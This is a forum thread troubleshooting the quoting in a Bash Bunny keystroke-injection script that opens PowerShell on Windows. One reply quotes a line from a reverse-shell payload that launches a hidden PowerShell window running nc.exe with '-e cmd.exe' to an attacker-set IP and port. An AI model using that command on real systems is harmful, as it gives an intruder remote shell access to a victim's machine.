Simple payload gets stuck halfway through

[HamHack]

Hey.

For some reason my Bash Bunny script gets stuck right after opening up the powershell, but I can't seem to figure out why it's happening. I tried replacing the line right under the 500 delay with a simple string, which made it work, but it won't work as is.

This is my script:

LED SETUP

ATTACKMODE HID STORAGE

LED ATTACK

Q SET_LANGUAGE gb

Q GUI r
Q DELAY 150
Q STRING powershell
Q ENTER

Q DELAY 500

Q STRING cd (gwmi -class win32_volume -filter "label='BashBunny'").Name.Substring(0,2)
Q ENTER
Q STRING cd payloads/switch1
Q ENTER

LED FINISH

[GermanNoob]

@HamHack, just use some quotes around the string:

 

Q STRING '''cd (gwmi -class win32_volume -filter "label='BashBunny'").Name.Substring(0,2)'''

Also think about to use 

RUN WIN powershell

 

[HamHack]

@GermanNoob That was definitely an improvement, as it's now being written out, but the string is missing the single quotes around the word BashBunny.

It's being written like this: cd (gwmi -class win32_volume -filter "label=BashBunny").Name.Substring(0,2)

But I need it to write it like this: cd (gwmi -class win32_volume -filter "label='BashBunny'").Name.Substring(0,2)

How do I get it to include the single quotes as well?

[HamHack]

@GermanNoob That was definitely an improvement, as it's now being written out, but the string is missing the single quotes around the word BashBunny.

It's being written like this: 

cd (gwmi -class win32_volume -filter "label=BashBunny").Name.Substring(0,2)

But I need it to write it like this: 

cd (gwmi -class win32_volume -filter "label='BashBunny'").Name.Substring(0,2)

How do I get it to include the single quotes as well?

[GermanNoob]

I'm not a powershell guy to be honest... 

But why aren't you using the similar commands from other payloads, e.g. RAZ_ReverseShell

QUACK STRING powershell -WindowStyle Hidden \".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe\"

 

[HamHack]

@GermanNoob Well do you know why I can't get the rubber ducky to write single quotes? It freezes every time I try to make it write them. Can I somehow escape them or something?

[GermanNoob]

I suppose because within the QUACK code there is a single quote used (but that's only a assumption)...

You will find a lot of stuff according this topic here: http://wiki.bash-hackers.org/syntax/quoting

[PoSHMagiC0de]

Issue is with how bash on the Bunny is interpreting your string.  An example is echo that line in a Linux bash terminal and you will see the issue.  Like replace "quack string" with echo..if you have access to a bash terminal.  If not then here is a trick to do.

After your QUACK STRING, encapsulate the whole command in double quotes.  Once you do that, you will only need to escape "$" and other inner double quotes.  Single quotes can be by themselves without needing to escape.  Example.

Q STRING "cd (gwmi -class win32_volume -filter \"label='BashBunny'\").Name.Substring(0,2)"

That should fix your issue without changing your method.

[HamHack]

@PoSHMagiC0de Hallelujah! I guess I'll be sleeping tonight after all. Thank you very much!